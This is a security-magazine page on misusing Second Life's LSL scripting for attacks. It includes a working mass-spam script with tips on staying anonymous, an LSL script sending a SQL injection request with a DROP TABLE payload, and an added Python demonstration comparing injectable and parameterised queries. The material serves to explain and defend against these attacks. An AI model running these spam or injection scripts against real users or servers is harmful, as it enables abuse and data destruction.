(IN)SECURE Magazine 17

Page 31

We started with a small script to send spam mails. The required steps are quite easy: we need a list of recipients, and we must be able to send emails, so:

1. Create a text file with email addresses and put it on a web server that you own.

2. Download the file with the LSL function llHTTPRequest from within SL and parse the response.

3. Send spam to each email address using llEmail. The emails are sent via your Second Life account, but of course you can use free accounts within Second Life to stay anonymous. Two caveats a practitioner should know: llEmail sleeps the script for 20 seconds per call, so one script manages about 180 mails per hour, and the mail goes out from an address derived from the object's key at lsl.secondlife.com with the object name and region prepended to the body, so each message is traceable to the sending object and its owner's account.

Here's a basic proof-of-concept spam script:

    // Globals the original omitted; the URL is a placeholder for a server you own
    string URL = "http://example.com";
    key http_request_id;    // handle returned by llHTTPRequest
    list my_list;           // recipient addresses parsed from the downloaded file
    integer i;

    default
    {
        state_entry()
        {
            // Fetch the recipient list: addresses separated by ';'
            http_request_id = llHTTPRequest(URL + "/sldemo.txt", [HTTP_METHOD, "GET"], "");
        }

        touch_start(integer total_number)
        {
            // Mail every parsed address (the original loop ran one index too far and
            // never reset i, so a second touch sent nothing)
            for (i = 0; i < llGetListLength(my_list); ++i)
            {
                llEmail(llList2String(my_list, i), "SL Spam", "Mine is longer than yours ;-)");
            }
        }

        http_response(key request_id, integer status, list metadata, string body)
        {
            if (request_id == http_request_id)
            {
                my_list = llParseString2List(body, [";"], []);
            }
        }
    }

Sending spam is feasible, but a real attack would be much nicer. SQL injection attacks are done via web requests against form fields or query parameters. We can send web requests with the function llHTTPRequest, so we can do real web attacks as long as they are not filtered on the Linden Lab servers. Note that the target's logs then show the simulator's address rather than the attacker's, but llHTTPRequest also adds X-SecondLife-* headers (object name and key, owner name and key, region) to every request, so a target that reads them can identify the sending object or simply reject traffic carrying them. Here's another small sample script for a SQL injection attack:

    // Placeholder for the target web server; the original left URL undeclared
    string URL = "http://example.com";
    key http_request_id;

    default
    {
        state_entry()
        {
            // Injected query parameter; the payload is illustrative, a real DROP TABLE needs a table name
            http_request_id = llHTTPRequest(URL + "/sldemo.aspx?user=sldemo';DROP Table;--",
                                            [HTTP_METHOD, "GET"], "");
        }

        touch_start(integer total_number)
        {
            llSay(0, "Web server owned!");
        }

        http_response(key request_id, integer status, list metadata, string body)
        {
            // Ignored here; status and body are what would actually show whether the injection worked
        }
    }
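To show what such a request does on the receiving end, here is an added example in Python (not code from the article, and not a Second Life or Linden Lab API) that builds the URL an llHTTPRequest would send, extracts the `user` parameter the way a server page would, and runs it against a constructed SQLite table, once through string concatenation and once through a bound parameter. It goes beyond the page's single case by also showing a `' OR '1'='1` payload that leaks every row through a driver that refuses stacked statements. The host sldemo.example, the `users` table and the `DROP TABLE users` payload are assumptions; the page's own payload names no table.

```python
import sqlite3
from urllib.parse import quote, unquote, urlsplit

# Constructed placeholder target; sldemo.aspx is the endpoint the article's
# script requests, the host is an assumption.
TARGET = "http://sldemo.example/sldemo.aspx"


def attack_url(payload):
    """Build the request an in-world llHTTPRequest would send for a payload."""
    return TARGET + "?user=" + quote(payload, safe="")


def user_param(url):
    """Extract the decoded `user` query parameter, as the server page sees it."""
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "user":
            return unquote(value)
    return ""


def make_db():
    """Constructed sample data standing in for the backend behind sldemo.aspx."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (name TEXT, email TEXT);"
        "INSERT INTO users VALUES ('sldemo', 'sldemo@example.com');"
        "INSERT INTO users VALUES ('alice', 'alice@example.com');"
    )
    return conn


def lookup_vulnerable(conn, user):
    """Vulnerable: the parameter is pasted into the SQL text."""
    sql = "SELECT email FROM users WHERE name = '" + user + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_vulnerable_stacked(conn, user):
    """Same concatenation on a code path that runs several statements per call.
    sqlite3's execute() refuses stacked statements; executescript() runs them
    all, which is what the page's ';DROP ...;--' payload relies on."""
    sql = "SELECT email FROM users WHERE name = '" + user + "'"
    conn.executescript(sql)


def lookup_safe(conn, user):
    """Hardened: bound parameter, the driver never interprets `user` as SQL."""
    rows = conn.execute("SELECT email FROM users WHERE name = ?", (user,))
    return [row[0] for row in rows]


def table_exists(conn, name):
    row = conn.execute(
        "SELECT COUNT(*) FROM sqlite_master WHERE type = 'table' AND name = ?",
        (name,),
    ).fetchone()
    return row[0] == 1


if __name__ == "__main__":
    db = make_db()
    leak = user_param(attack_url("' OR '1'='1"))
    print("vulnerable:", lookup_vulnerable(db, leak))  # every email in the table
    print("safe:", lookup_safe(db, leak))              # []
    drop = user_param(attack_url("sldemo';DROP TABLE users;--"))
    lookup_vulnerable_stacked(db, drop)
    print("users table still exists:", table_exists(db, "users"))  # False
```

The parameterised lookup returns nothing for either payload because the quote and the comment marker are bound as data; the damage in the stacked case depends on the driver allowing several statements per call, which many database libraries do by default.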

www.insecuremag.com
